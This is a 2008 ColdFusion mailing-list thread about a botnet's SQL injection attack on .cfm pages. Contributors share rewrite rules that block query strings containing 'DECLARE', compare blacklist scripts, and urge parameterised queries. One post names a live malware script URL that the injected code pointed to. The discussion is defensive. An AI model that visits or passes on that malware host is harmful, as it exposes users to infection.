Our site has now seen just over 200,000 attack attempts over the past 48 hours, 73,000 attack attempts over the past 5 hours. Not nearly a DOS concern yet, as the acceleration of attacks has started to at least flatten a bit over the last 2-3 hours, but we're watching it carefully. The attacks appear to only effect MSSQL.  MySql seems to be safe from THIS attack, but clearly it's time to batten the hatches if you haven't already. We have 1.2 million pages indexed in Google, where the botnet is extracting URLs from.   The level of the attack you are witnessing is likely proportional to your presence in google. The attacks are ONLY against our .CFM pages.   No attacks are being run against our obfuscated CFM pages (product.cfm?id=12 => /product/12.html ). Here's the botnet attack that appears to be hitting us all: http://www.bloombit.com/Articles/2008/05/ASCII-Encoded-Binary-String-Automated-SQL-Injection.aspx Decoding the hex of our current attacks and most of them are pointing to http://sdo.1000mg.cn/csrss/w.js (malware).   That is the Asprox botnet, which has beem going through ASP sites for a while...   looks like they recruited a bunch of drones, and those drones have moved from ASP (verynx attacks) to attack CF.   Pretty ingenious really, infecting websites via injection attack in order to infect clients with browser vulnerabilities. The more CF sites that get infected, the more drones that are recruited, and the more persistent the attacks become. Here's the rewrite I'm using (linux apache) to keep traffic off the app server. RewriteCond %{QUERY_STRING} .*DECLARE.* RewriteRule ^(.*)$  violation.htm [nc,L] Interesting philosophical thought:   I can't help but believe that the URL rewriting we do over much of our site (product.cfm?id=14  appearing as /product/14.html etc etc) has helped reduce the attacks significantly.   It seems to me that such URL rewriting is actually a very important security tool as we enter a period where botnets start targetting .cfm pages.     I plan on increasing our CFM obfuscation over the coming weeks to help hide CF from the search engines and automated attacks.   Seems to me that it's a lot safer presenting your entire site as HTML to the outside world. Regards Terry

I'm using ionic isapi with the following RewriteCond %{QUERY_STRING} ;DECLARE [I] RewriteRule ;DECLARE /index.htm [I,L] it works perfectly except for a single issue. If you're using a custom 404 in iis (like piping 404 errors to CF), then the isapi will hang the server. -- Michael Dinowitz (http://www.linkedin.com/in/mdinowitz) President: House of Fusion    (http://www.houseoffusion.com) Publisher: Fusion Authority    (http://www.fusionauthority.com) Adobe Community Expert / Advanced Certified ColdFusion Professional

> Here's the rewrite I'm using (linux apache) to keep traffic off the app server. > > RewriteCond %{QUERY_STRING} .*DECLARE.* > RewriteRule ^(.*)$  violation.htm [nc,L] Okay, I'm a rewrite and apache newbie. I'm trying to replicate locally before doing this on my server. I'm running Win XP with Apache 2.2. In my httpd.conf file I removed the # sign from this line: LoadModule rewrite_module modules/mod_rewrite.so Then I added the above rewrite rules within one of my <VirtualHost> sites. Should that be all I have to do? Doesn't seem to work if I do myLocalSite/index.cfm?test=DECLARE Do the rewrite rules go somewhere else? Do I need something more than just he LoadModule line? Thanks, -- Matt Williams "It's the question that drives us."

Scratch that. declare is case sensitive. Seems to work now. Matt ----- Excess quoted text cut - see Original Post for more -----

Has anyone written a broad-spectrum script (i.e. scrubs URL variables, form variables, looks for verboten words, etc.) that is effective against these attacks?  If not, why don't we get coordinated and write something as a community that users can simple include/invoke via application.cfm or in specific files...something that is not limited to a framework and something that would perhaps work with CF6/7/8.  I know there are people on this list who are MUCH more experienced than I am that would have a much more elegant solution than I could come up with.  Moreover, because virtually all of my sites are on shared hosts (Windows/IIS/CF8), I don't have the luxury of being able to do URL rewrites and that sort of thing. Thanks, Pete

Pete, Gabriel Reed and Mary Jo Sminkey created a decent regex and script that does a good job. http://www.coldfusionmuse.com/index.cfm/2008/7/28/Coldfusion-Blacklist-Funct ion-for-SQLi It uses a native java regex pattern matcher for effeciency - meaning it will work only on cf 6.x or above. Mary Jo wrapped it up in an include file here: http://www.cfwebstore.com/index.cfm?fuseaction=page.download&downloadID=18 This file can be dropped into a cfapplication.cfm file (note: it must come AFTER the <cfapplication> tag or you will need to edit it to not use the application scope). Also please note that using a black list function should be considered a first line of defence and not a solution. It has several weaknesses including: 1) It protects only against known threats. In order to be excluded we have to be a step far enough ahead to make sure the pattern is included. 2) It will produce false positives. 3)  It is not role or user based. 4) Tend to give a false sense of security. Validation, DB permissions and congurations, and binding (cfqp) are all important factors in protecting against injection. I have to say that I'm watching this unfold and a lot of effort is going into sticking our finger in the dike with blacklisting techniques instead of laying out roadmaps for improving code. Yes I know - some code has thousands of queries and it is boring (not to mention thankless) to laboriously insert cfqueryparam into query after query. But that is a major part of the "fix" - indeed a bigger part of the fix than any blacklisting technique we can devise together. Having said all of that, at this moment I completely understand the urgency to stop the attack by the shortest means possible. In fact, the frequency of these attacks is causing a denial of  service effect for sites with a ton of .cfm pages indexed - so stopping the attack before it get's to the meat of your code is important. My blog, for example, got thousands of attacks overnight. All of them "reached" the database and failed - but that doesn't mean I'm just going to let them keep on hitting the DB.  I put in my blocker script to intercept the requests and abort them before they ever get to the DB. Recent efforts have gone further up the request chain and focused on ISAPI rewrite and Mod_rewrite (http://www.coldfusionmuse.com/index.cfm/2008/8/8/isapi-rewrite-rule-prevent s-sql-injection) with the idea that these spurious requests should be intercepted and handled prior to reaching the Coldfusion server altogether. In this situation I am in favor of such efforts in spite of the general catch-all nature - at least until the frequency of such attacks dies down. -Mark Mark A. Kruger, CFG, MCSE (402) 408-3733 ext 105 www.cfwebtools.com www.coldfusionmuse.com www.necfug.com

>1) It protects only against known threats. In order to be excluded we have >to be a step far enough ahead to make sure the pattern is included. >2) It will produce false positives. >3)  It is not role or user based. >4) Tend to give a false sense of security. Just to add to this, in my own testing of the RegEx, I definitely was getting false positives, with just normal text strings (no other characters needed). So I do have some concerns about any long-term use of it, and would caution anyone using it to be aware that it may block more than you intend it to. In my own software, I've modified how it is called so it's only used on the front-end, open-to-the-world part of my software, as if someone gets through the back-end security checks, they certainly don't need to bother with a SQL injection to mess with the database! ;-) The goal here is just mainly to block the request as soon as the invalid strings in any vulnerable scope are detected, and that's essentially what it does, scanning the url, form, cookie and cgi scopes. --- Mary Jo

----- Excess quoted text cut - see Original Post for more ----- I also had a concern about thread safety; it's caching the java.util.regex.Matcher object in Application scope, and calling Application.injChecker.reset(testvar) for each url/form/etc variable -- seems like Matcher.reset() changes state of the cached Matcher object? It might be safer to cache the Pattern, then get the rePattern.matcher('') on each request. Looks cool otherwise, though I might remove some of the keywords from the regex before using here. Thanks, - David

> I also had a concern about thread safety; it's caching the java.util. > regex.Matcher object in Application scope, and calling Application. > injChecker.reset(testvar) for each url/form/etc variable -- seems like > Matcher.reset() changes state of the cached Matcher object? Thanks for pointing this out...I updated the tool on my site to address this and also switched it to use a different RegEx that seems to work better and throw less false positives. Same link to download as before: http://www.cfwebstore.com/index.cfm?fuseaction=page.download&downloadID=18 --- Mary Jo

I am currently using the SQLprev.cfm from Jochem to stop the onslaught of superfluous bandwidth suckage from my server, but was wondering what the difference would be with this one. I am not looking to start a "my SQL Injection blocker is better than yours", yet trying to educate myself on just what is going on and what is best to do. Does this thing just raise it's ugly head every now and then and go away for a while? This is the first I have seen of it on my server. Thanks in advance, ~David G. Moore, Jr.    UpstateWeb, LLC> Subject: Re: SQL injection attack on House of Fusion> From: maryjos@cfwebstore.com> To: cf-talk@houseoffusion.com> Date: Wed, 20 Aug 2008 14:36:46 -0400> > > I also had a concern about thread safety; it's caching the java.util.> > regex.Matcher object in Application scope, and calling Application.> > injChecker.reset(testvar) for each url/form/etc variable -- seems like > > Matcher.reset() changes state of the cached Matcher object? > > Thanks for pointing this out...I updated the tool on my site to address this and also switched it to use a different RegEx that seems to work better and throw less false positives. Same link to download as before:> > http://www.cfwebstore.com/index.cfm?fuseaction=page.download&downloadID=18>; > --- Mary Jo> > > > > > > >

> I am currently using the SQLprev.cfm from Jochem to stop the onslaught > of superfluous bandwidth suckage from my server, but was wondering > what the difference would be with this one. Since I am not familiar with his, I cannot say what the difference would be. I did include URL, form, cookie and common CGI variables into mine as well so it's pretty comprehensive for both this attack and others that might start looking for other vulnerable areas. It uses Gabriel's method of leveraging the java regex pattern matcher which seems to give better performance and less likely to hang on large strings than with CF. Luis Melo who contributed the RegEx that I am now using has his own SQLi blocker as well that includes a bunch of additional functions (such as keeping a list of blacklisted IP addresses in application memory) which some people may like as well. My goal was to just try and put something together that could easily be dropped in any application and do its thing with fairly minimal overhead. > Does this thing just raise it's ugly head every now and then and go > away for a while? This is the first I have seen of it on my server. This particular attack? It does seem to come and go. I have no doubt the hackers will look for other avenues to exploit once it seems that this one is no longer having much effect.

> I am currently using the SQLprev.cfm from Jochem to stop the onslaught of superfluous bandwidth suckage from my server, but was wondering what the difference would be with this one. I am not looking to start a "my SQL Injection blocker is better than yours", yet trying to educate myself on just what is going on and what is best to do. My original SQLprev script (http://www.gravityfree.com/_sqlprev.cfm.txt) just checks for basic SQL keywords with a semicolon in URL variables. It's a quick and dirty way to give you some protection from bots short-term while your code base is updated to use best practices and secure coding methods.  Mary Jo's is more thorough in that it checks additional variable scopes, and can help protect better against hand-drafted attacks, but may have a higher potential for false positives (though it's improved recently from what I can tell). SQLPrev has a version compatible with CF5 for those who need it where the other script relies on CFMX functions to run.  I'm not saying one is better than the other, they both get the job done.  Just use whatever works best for you, and update your code so that you don't need either of them <g>. -Justin Scott

When you say "Update Your Code", are you saying using <cfqueryparam>? But even so, the SQL injection still will use up countless resources instead of cutting it off early. So, go back and fix 1,000's of lines of code I have developed over the last 'upteen' years or stop it before it starts? Is this something new to CF8 or just a necessary evil because of SQL Injection Attacks. Not trying to pick a fight, becuase I am sure you have forgotten more code than I will ever know (seriously) and I am probably just being lazy (seriously), but is <cfqueryparam> something a lot of programmers really use? I have never seen <cfqueryparam> used on any tags I have purchased or exchanged and I am afraid all I know is what I have learned from books and forums. This is the first I have ever heard of using <cfqueryparam>. ~David G. Moore, Jr.> Subject: Re: SQL injection attack on House of Fusion> From: jscott@gravityfree.com> To: cf-talk@houseoffusion.com> Date: Wed, 20 Aug 2008 17:01:42 -0400> > > I am currently using the SQLprev.cfm from Jochem to stop the onslaught of superfluous bandwidth suckage from my server, but was wondering what the difference would be with this one. I am not looking to start a "my SQL Injection blocker is better than yours", yet trying to educate myself on just what is going on and what is best to do. > > My original SQLprev script (http://www.gravityfree.com/_sqlprev.cfm.txt) > just checks for basic SQL keywords with a semicolon in URL variables. > It's a quick and dirty way to give you some protection from bots > short-term while your code base is updated to use best practices and > secure coding methods. Mary Jo's is more thorough in that it checks > additional variable scopes, and can help protect better against > hand-drafted attacks, but may have a higher potential for false > positives (though it's improved recently from what I can tell).> > SQLPrev has a version compatible with CF5 for those who need it where > the other script relies on CFMX functions to run. I'm not saying one is > better than the other, they both get the job done. Just use whatever > works best for you, and update your code so that you don't need either > of them <g>.> > > -Justin Scott> > > >

> When you say "Update Your Code", are you saying using <cfqueryparam>? Yes, that's what he is saying. > so, go back and fix 1,000's of lines > of code I have developed over the last 'upteen' years or stop it > before it starts? Because if you don't, you are putting a LOT of faith in these blockers and assuming that hackers won't find other ways to attack a vulnerable application that doesn't get by them. Personally, I'm not sure I'd put *that* much trust in them, if I really cared about my sites being safe. > Is this something new to CF8 or just a necessary > evil because of SQL Injection Attacks. Nothing new, and certainly not unique to ColdFusion either. > is <cfqueryparam> something a lot of programmers > really use? Uh, yes. > This is the first I have ever heard of using <cfqueryparam>. That is a truly scary thought. I hope you will spend some time on the ColdFusion blogs which have lots of information on the importance of using it. --- Mary Jo

David Moore, Jr. wrote: > Not trying to pick a fight, becuase I am sure you have forgotten more code than I will ever know (seriously) and I am probably just being lazy (seriously), but is <cfqueryparam> something a lot of programmers really use? I have never seen <cfqueryparam> used on any tags I have purchased or exchanged and I am afraid all I know is what I have learned from books and forums. This is the first I have ever heard of using <cfqueryparam>. Yes <cfqueryparam...> is well used and for very good reasons.  One of which is what do you want to happen if the next clever hacker comes along with an attack that gets around all these solutions that have been developed to stop them at the gate?  Do you really want to gamble your data and possible career on that fact that you can out guess every hacker who collectively have almost endless time and resources to figure out ways around these solutions? I equate it to this analogy I have been dying to use for some time. Would you never build the city walls and gates just because you have sentries watching the road?  No matter how good and undefeatable you think your sentries are. Or why have database passwords if you have a firewall.  (That one might be better)

> Not trying to pick a fight, becuase I am sure you have forgotten more code ----- Excess quoted text cut - see Original Post for more ----- It depends on what you mean by "a lot".  But, if you'd been hanging out on this list at all, you'd have heard of cfqueryparam.  It's discussed quite often.  But, since most people learn ColdFusion on their own, and it's not a "necessary" tag to know about to get things done, you could go for years without using it or even understanding why it's needed. -- Josh

And this is where I am. I have been using CF since 4.5. Very Scary. Glad I have found this list. I am sure to learn a lot. I will try to read and not bother. Thanks for the SMACK DOWN. I will start to write it in and become more learned. I can say, just in the last weeks since joining I have learned a lot. ~David G. Moore, Jr.> Subject: Re: SQL injection attack on House of Fusion> From: pc@oakcitygraphics.com> To: cf-talk@houseoffusion.com> Date: Wed, 20 Aug 2008 14:35:19 -0700> > > Not trying to pick a fight, becuase I am sure you have forgotten more code > > than I will ever know (seriously) and I am probably just >being lazy > > (seriously), but is <cfqueryparam> something a lot of programmers really > > use? I have never seen <cfqueryparam> used on >any tags I have purchased > > or exchanged and I am afraid all I know is what I have learned from books > > and forums. This is the first I >have ever heard of using <cfqueryparam>.> > It depends on what you mean by "a lot". But, if you'd been hanging out on > this list at all, you'd have heard of cfqueryparam. It's discussed quite > often. But, since most people learn ColdFusion on their own, and it's not a > "necessary" tag to know about to get things done, you could go for years > without using it or even understanding why it's needed.> > -- Josh> > > >

> When you say "Update Your Code", are you saying using <cfqueryparam>? But even so, the SQL injection still will use up countless resources instead of cutting it off early. So, go back and fix 1,000's of lines of code I have developed over the last 'upteen' years or stop it before it starts? Is this something new to CF8 or just a necessary evil because of SQL Injection Attacks. Essentially, yes, code should be using cfqueryparam and other secure coding methods to keep the baddies out.  The resources will get used either way, really.  You can either rely on a filter up-front and use up CPU cycles regardless of whether a user is legitimate or not, or even whether or not a query is being run in the page or not, etc.  Or, you can implement cfqueryparam where appropriate and only use those cycles where they're needed, and you'll get the added benefit of prepared statements on the SQL Server in most cases and the queries will run slightly faster as a result.  Either way you go, protect yourself and your clients. SQL injection attacks have been around since before I got started in web development, and secure coding against them has been a best practice just as long.  I remember updating "old" CF code I inherited way back when I was using ColdFusion 4, so it's certainly nothing new. It's unfortunate that you haven't seen this in practice until now, but it really is something you should be doing.  It's been my observation over the years that web programmers in general (not just limited to ColdFusion) tend to learn about security only when there is a breach of some kind, and then have to scramble to learn under fire.  Just as an example, how many out there run e-commerce applications and have never heard of PCI-DSS? I'm not picking on you specifically, David, so please don't think I'm calling you out or anything.  I'm always learning new things myself, but we web developers need to collectively get more educated about the risks and threats we face and alter our practice accordingly. -Justin Scott

Justin, I certainly don't feel picked on. I feel blessed to have a place where I can learn from people who do know so much. And you are right. I (we) only seem to learn under fire. I am a one man business owner in a small town with limited resources and time. 10 hour days, work weekends, what is family time except coaching baseball-soccer-basketball, and I have forgotten what sleep even is. So, what do we do? I am a little embarrassed to say I didn't know, but at least in honesty I can learn and get a complete picture. So, what is PCI-DSS (he asks sheepishly) or is that a whole nother Post???? Thanks everyone! ~David G. Moore, Jr. P.S. Speaking of Smack Down's. Mary Jo's got a great right cross :) Go get'em girl!> Subject: Re: SQL injection attack on House of Fusion> From: jscott@gravityfree.com> To: cf-talk@houseoffusion.com> Date: Wed, 20 Aug 2008 17:41:12 -0400> > > When you say "Update Your Code", are you saying using <cfqueryparam>? But even so, the SQL injection still will use up countless resources instead of cutting it off early. So, go back and fix 1,000's of lines of code I have developed over the last 'upteen' years or stop it before it starts? Is this something new to CF8 or just a necessary evil because of SQL Injection Attacks. > > Essentially, yes, code should be using cfqueryparam and other secure > coding methods to keep the baddies out. The resources will get used > either way, really. You can either rely on a filter up-front and use up > CPU cycles regardless of whether a user is legitimate or not, or even > whether or not a query is being run in the page or not, etc. Or, you > can implement cfqueryparam where appropriate and only use those cycles > where they're needed, and you'll get the added benefit of prepared > statements on the SQL Server in most cases and the queries will run > slightly faster as a result. Either way you go, protect yourself and > your clients.> > SQL injection attacks have been around since before I got started in web > development, and secure coding against them has been a best practice > just as long. I remember updating "old" CF code I inherited way back > when I was using ColdFusion 4, so it's certainly nothing new.> > It's unfortunate that you haven't seen this in practice until now, but > it really is something you should be doing. It's been my observation > over the years that web programmers in general (not just limited to > ColdFusion) tend to learn about security only when there is a breach of > some kind, and then have to scramble to learn under fire. Just as an > example, how many out there run e-commerce applications and have never > heard of PCI-DSS?> > I'm not picking on you specifically, David, so please don't think I'm > calling you out or anything. I'm always learning new things myself, but > we web developers need to collectively get more educated about the risks > and threats we face and alter our practice accordingly.> > > -Justin Scott> > > >

> I certainly don't feel picked on. I feel blessed to have a place where I can learn from people who do know so much. And you are right. I (we) only seem to learn under fire. I am a one man business owner in a small town with limited resources and time. 10 hour days, work weekends, what is family time except coaching baseball-soccer-basketball, and I have forgotten what sleep even is. So, what do we do? Well, the first step is getting more connected to the community, being exposed to different styles, and being on a list such as this one is a great start.  Presentations at user groups can also cover topics such as this if you have one near your area. > So, what is PCI-DSS (he asks sheepishly) or is that a whole nother Post???? In short, PCI-DSS is the Payment Card Industry Data Security Standard. It is required for any merchant who accepts, processes, handles, stores, or transmits credit card or debit card information.  It isn't law, but your merchant account (or those of your clients) will have provisions in their contracts that require compliance with these rules.  You can read more about it at: https://www.pcisecuritystandards.org/security_standards/pci_dss.shtml That's another whole can o' worms though. -Justin Scott

Consider me connected. At the same time, I will try not to just suck the life out of the list and provide substance where I can. I was a morning radio announcer for 20 years before becoming a web programmer, so if you can't remember the name of that song or artist - just ask. :) As for the can o' worms. If you're ever in Spartanburg, SC, just bring 'em along and I can show you some really nice fishin! Seriously, thanks everyone! ~David G. Moore, Jr.> Subject: Re: SQL injection attack on House of Fusion> From: jscott@gravityfree.com> To: cf-talk@houseoffusion.com> Date: Wed, 20 Aug 2008 18:17:34 -0400> > > I certainly don't feel picked on. I feel blessed to have a place where I can learn from people who do know so much. And you are right. I (we) only seem to learn under fire. I am a one man business owner in a small town with limited resources and time. 10 hour days, work weekends, what is family time except coaching baseball-soccer-basketball, and I have forgotten what sleep even is. So, what do we do?> > Well, the first step is getting more connected to the community, being > exposed to different styles, and being on a list such as this one is a > great start. Presentations at user groups can also cover topics such as > this if you have one near your area.> > > So, what is PCI-DSS (he asks sheepishly) or is that a whole nother Post????> > In short, PCI-DSS is the Payment Card Industry Data Security Standard. > It is required for any merchant who accepts, processes, handles, stores, > or transmits credit card or debit card information. It isn't law, but > your merchant account (or those of your clients) will have provisions in > their contracts that require compliance with these rules. You can read > more about it at:> > https://www.pcisecuritystandards.org/security_standards/pci_dss.shtml>; > That's another whole can o' worms though.> > > -Justin Scott> > > >

Don't feel bad, David.   I am a freelance CF programmer.  I spend most of my time working on bug fixes or feature enhancements on code written by others.    And the vast majority of files I work on have no <cfqueryparam. Most of the code I work on really needs re-writing from scratch it's so poorly written.   At least in my experience, very few CF programmers use <cfqueryparam.   It's quite frightening really.    Not only is the code vulnerable to attack, it's slow, inefficent, and often just plain wrong. I'd say one fo the best things you have ever done as a CF programmer is join this list and pay attention to the things clever folks like Dave Watts have to say.    Rare is the day when I dont learn something useful on this list. -- Cheers Mike Kear Windsor, NSW, Australia Adobe Certified Advanced ColdFusion Developer AFP Webworks http://afpwebworks.com ColdFusion, PHP, ASP, ASP.NET hosting from AUD$15/month

> P.S. Speaking of Smack Down's. Mary Jo's got a great right cross :) Go > get'em girl! LOL, actually I am a pacifist at heart and always try to not lose my temper (serves me well with customers, particularly the endlessly annoying ones!) As for not knowing what cfqueryparam is and how to properly secure an application (there's more to it than just cfqueryparam) hopefully all these issues that people are dealing with will help such information make it's way into even beginner CF materials, and not have it be so much of an afterthought as it seems to have been up to this point. --- Mary Jo

>Actually I am a pacifist at heart and always try to not lose my temper (serves me well with customers, particularly the endlessly annoying ones!) LOLOL. I am actually a moderately conservative liberal. I believe in loosing my temper only when I know I can't find it. > As for not knowing what cfqueryparam is and how to properly secure an application (there's more to it than just cfqueryparam) hopefully all these issues that people are dealing with will help such information make it's way into even beginner CF materials, and not have it be so much of an afterthought as it seems to have been up to this point. On a serious note, it would have been nice that I would have been more aware when I started coding those many years ago. I have more lines of code that need reworking than I care to think of, but I have to start somewhere. > --- Mary Jo Thanks for your help today! You have been incredibly patient and kind. Now, I must go home because my wife has called for her third and last time, which means I am on the couch... ~David "Rock" Moore _________________________________________________________________ Get ideas on sharing photos from people like you.  Find new ways to share. http://www.windowslive.com/explore/photogallery/posts?ocid=TXT_TAGLM_WL_Photo_Gallery_082008

As someone who was hit by the attack on the first day. I will say I've used cfqueryparam for years and yet I had a handful of pages with old code where I was not using cfqueryparam. It just takes one page that's publically accessible to do damage. Once I fixed the pages in question, try as they might, I have not been effected since. Using cfqueryparam is a good habit to get into, to protect your sites and client sites. I was also  running a forum program I purchased years ago CFForum2000 I think, and all the code in that product was not using cfqueryparam either. I had to go through and edit the code throughout. It's possible their newer versions are using proper coding but it was a bit of a pain, and really my own fault for not rechecking that code long ago. Kelly David Moore, Jr. wrote: ----- Excess quoted text cut - see Original Post for more -----

>is <cfqueryparam> something a lot of programmers really use? Only the good ones.  ;) Thanks, Eric David Moore, Jr. wrote: ----- Excess quoted text cut - see Original Post for more ----- otential for false > positives (though it's improved recently from what I can tell).> > SQLPrev has a version compatible with CF5 for those who need it where > the other script relies on CFMX functions to run. I'm not saying one is > better than the other, they both get the job done. Just use whatever > works best for you, and update your code so that you don't need either > of them <g>.> > > -Justin Scott> > > >

Eric, A good answer might be .... "it is now"  :) >is <cfqueryparam> something a lot of programmers really use? Only the good ones.  ;) Thanks, Eric David Moore, Jr. wrote: > When you say "Update Your Code", are you saying using <cfqueryparam>? But even so, the SQL injection still will use up countless resources instead of cutting it off early. So, go back and fix 1,000's of lines of code I have developed over the last 'upteen' years or stop it before it starts? Is this something new to CF8 or just a necessary evil because of SQL Injection Attacks. >   > Not trying to pick a fight, becuase I am sure you have forgotten more code than I will ever know (seriously) and I am probably just being lazy (seriously), but is <cfqueryparam> something a lot of programmers really use? I have never seen <cfqueryparam> used on any tags I have purchased or exchanged and I am afraid all I know is what I have learned from books and forums. This is the first I have ever heard of using <cfqueryparam>. ----- Excess quoted text cut - see Original Post for more ----- otential for false > positives (though it's improved recently from what I can tell).> > SQLPrev has a version compatible with CF5 for those who need it where > the other script relies on CFMX functions to run. I'm not saying one is > better than the other, they both get the job done. Just use whatever > works best for you, and update your code so that you don't need either > of them <g>.> > > -Justin Scott> > > > > >

Well, it is my goal :) not there yet...> Subject: Re: SQL injection attack on House of Fusion> From: cftalk@ecartech.com> To: cf-talk@houseoffusion.com> Date: Wed, 20 Aug 2008 16:59:26 -0500> > >is <cfqueryparam> something a lot of programmers really use?> > > Only the good ones. ;)> > > Thanks,> > Eric> > David Moore, Jr. wrote:> > When you say "Update Your Code", are you saying using <cfqueryparam>? But even so, the SQL injection still will use up countless resources instead of cutting it off early. So, go back and fix 1,000's of lines of code I have developed over the last 'upteen' years or stop it before it starts? Is this something new to CF8 or just a necessary evil because of SQL Injection Attacks. > > > > Not trying to pick a fight, becuase I am sure you have forgotten more code than I will ever know (seriously) and I am probably just being lazy (seriously), but is <cfqueryparam> something a lot of programmers really use? I have never seen <cfqueryparam> used on any tags I have purchased or exchanged and I am afraid all I know is what I have learned from books and forums. This is the first I have ever heard of using <cfqueryparam>.> > > > ~David G. Moore, Jr.> Subject: Re: SQL injection attack on House of Fusion> From: jscott@gravityfree.com> To: cf-talk@houseoffusion.com> Date: Wed, 20 Aug 2008 17:01:42 -0400> > > I am currently using the SQLprev.cfm from Jochem to stop the onslaught of superfluous bandwidth suckage from my server, but was wondering what the difference would be with this one. I am not looking to start a "my SQL Injection blocker is better than yours", yet trying to educate myself on just what is going on and what is best to do. > > My original SQLprev script (http://www.gravityfree.com/_sqlprev.cfm.txt) > just checks for basic SQL keywords with a semicolon in URL variables. > It's a quick and dirty way to give you some protection from bots > short-term while your code base is updated to use best practices and > secure coding methods. Mary Jo's is more thorough in that it checks > additional variable scopes, and can help protect better against > hand-drafted attacks, but may have a higher p> otential for false > positives (though it's improved recently from what I can tell).> > SQLPrev has a version compatible with CF5 for those who need it where > the other script relies on CFMX functions to run. I'm not saying one is > better than the other, they both get the job done. Just use whatever > works best for you, and update your code so that you don't need either > of them <g>.> > > -Justin Scott> > > > > > > > > >

A while ago I read a totally rivetting book called "The Art Of Intrusion"  by Kevin D Mitnick, the legendary hacker who was sent to jail for his intrusion exploits.    He runs a security company now, that tests you security and reports back on how well you've done. He says one of the most common failures of security systems of all kinds is that they rely on a secure perimeter.    The theory is that if we keep the hoards out of the city at the boundaries,  that's all we need to do.   Unfortunately all the bad guys need is a single crack in that outer perimeter  and tehy can go wherever they like.   So his hacking attempts usually meant hunting for some hole in the wall, and once through that hole the entire enterprise was laid out for the taking. He'd find a router left online but unsecure by some lazy support person who wanted to be able to work from home.  Or a long-forgotten modem somewhere,   and once through that security hole,  there were no other security blockers and teh whole network was his for the raping and pillaging. The lesson we learn from this?    Dont rely on only one defense mechanism.  All it takes is one crack in that armour and you're dead. You need to use all the weapons you have at your disposal.   In this case, we need to use the Regex blockers,  <cfqueryparam,  strong passwords,  regular password changing,   separate physical machines for web and database - everything you can think of to make it more difficult for the  attackers. That book was a great read on its own, but a real education for me as a web developer.  i heartily recommend it.   The opening chapter is highly amusing - where he is hired to probe security at a company, and at the review meeting where he presented his report,  he said 'yes i managed to get in and managed to get some unauthorised access.    And i think you should have done a better job on your applicatoin for a raise.   And did you know you are being paid less than others of equivalent rank in your company?    Oh and the profits you're going to report next month are x xx xx ..   you have a secretary who is having an affair with one of your senior execs."     When their mouths gaped open he finished it with the clincher .. "oh and this PC i'm using for the presentation - it's yours.  Your security manager gave it to me, along with remote admin access to you network, and i have been working remotely through your network for the past month." A fantastic read. Cheers Mike Kear Windsor, NSW, Australia Adobe Certified Advanced ColdFusion Developer AFP Webworks http://afpwebworks.com ColdFusion, PHP, ASP, ASP.NET hosting from AUD$15/month

Funny, I went to high school with him.  Had a comp sci class with him where he spent quite a bit of time trying to get passwords from unsuspecting people. A while ago I read a totally rivetting book called "The Art Of Intrusion"  by Kevin D Mitnick, the legendary hacker who was sent to jail for his intrusion exploits.    He runs a security company now, that tests you security and reports back on how well you've done.

So, I have found like the "Mother Load" of good programmers who really care about Cold Fusion and take the time to do it right? Becuase every peice of code I have ever gotten from Adobe Exchange or Purchase from other sites has never had <cfqueryparam>. And I know Ben is going to shoot me, because looking back at some of his Advanced books now I see where he says I should be using it. I guess my 10 hour days just turned into 14 hours. Anybody got a Starbucks Supersize Java Java Double Caffeine coupon? Eric is pretty good at the Smack Down too, Eric The Great takes David the Geek over the ropes and into the first row of chairs! (Yes, I am from the South and everything references Wrestling or Nascar) ~David> Subject: Re: SQL injection attack on House of Fusion> From: cftalk@ecartech.com> To: cf-talk@houseoffusion.com> Date: Wed, 20 Aug 2008 16:59:26 -0500> > >is <cfqueryparam> something a lot of programmers really use?> > > Only the good ones. ;)> > > Thanks,> > Eric> > David Moore, Jr. wrote:> > When you say "Update Your Code", are you saying using <cfqueryparam>? But even so, the SQL injection still will use up countless resources instead of cutting it off early. So, go back and fix 1,000's of lines of code I have developed over the last 'upteen' years or stop it before it starts? Is this something new to CF8 or just a necessary evil because of SQL Injection Attacks. > > > > Not trying to pick a fight, becuase I am sure you have forgotten more code than I will ever know (seriously) and I am probably just being lazy (seriously), but is <cfqueryparam> something a lot of programmers really use? I have never seen <cfqueryparam> used on any tags I have purchased or exchanged and I am afraid all I know is what I have learned from books and forums. This is the first I have ever heard of using <cfqueryparam>.> > > > ~David G. Moore, Jr.> Subject: Re: SQL injection attack on House of Fusion> From: jscott@gravityfree.com> To: cf-talk@houseoffusion.com> Date: Wed, 20 Aug 2008 17:01:42 -0400> > > I am currently using the SQLprev.cfm from Jochem to stop the onslaught of superfluous bandwidth suckage from my server, but was wondering what the difference would be with this one. I am not looking to start a "my SQL Injection blocker is better than yours", yet trying to educate myself on just what is going on and what is best to do. > > My original SQLprev script (http://www.gravityfree.com/_sqlprev.cfm.txt) > just checks for basic SQL keywords with a semicolon in URL variables. > It's a quick and dirty way to give you some protection from bots > short-term while your code base is updated to use best practices and > secure coding methods. Mary Jo's is more thorough in that it checks > additional variable scopes, and can help protect better against > hand-drafted attacks, but may have a higher p> otential for false > positives (though it's improved recently from what I can tell).> > SQLPrev has a version compatible with CF5 for those who need it where > the other script relies on CFMX functions to run. I'm not saying one is > better than the other, they both get the job done. Just use whatever > works best for you, and update your code so that you don't need either > of them <g>.> > > -Justin Scott> > > > > > > > > >

> So, I have found like the "Mother Load" of good programmers who really care about Cold Fusion and take the time to do it right? Pretty much.  The skill level on the list varies from "can express the meaning of life in ColdFusion" to "what's a database" so your experience may vary.  I'd like to think that everyone here, including me, is looking to learn through the experience of others, so you're in the right place.  Welcome! -Justin Scott

> Eric is pretty good at the Smack Down too, Eric The Great takes David > the Geek over the ropes and into the first row of chairs! (Yes, I am > from the South and everything references Wrestling or Nascar) Here's another "smack down" for you....it would be nice if you could remove all the extra quoted stuff on your posts....take a look at the online web archives, it really makes a mess of the thread! --- Mary Jo

Mary Jo, Sorry. Didn't see all that. First time using this kind of post.  > Here's another "smack down" for you....it would be nice if you could remove all the extra quoted stuff on your posts....take a look at the online web archives, it really makes a mess of the thread!  Will do better in the future. No way for me to go in an edit that once it is posted? YUCK. Where's a good Langolier when you need one? Thanks for the education though. ~David P.S. I like your Smack Downs. You got GRIT! Were you wearing a cape or mask when you wrote that SMACK!? _________________________________________________________________ See what people are saying about Windows Live.  Check out featured posts. http://www.windowslive.com/connect?ocid=TXT_TAGLM_WL_connect2_082008

David Moore, Jr. wrote: > I am currently using the SQLprev.cfm from Jochem The what from whom? Jochem

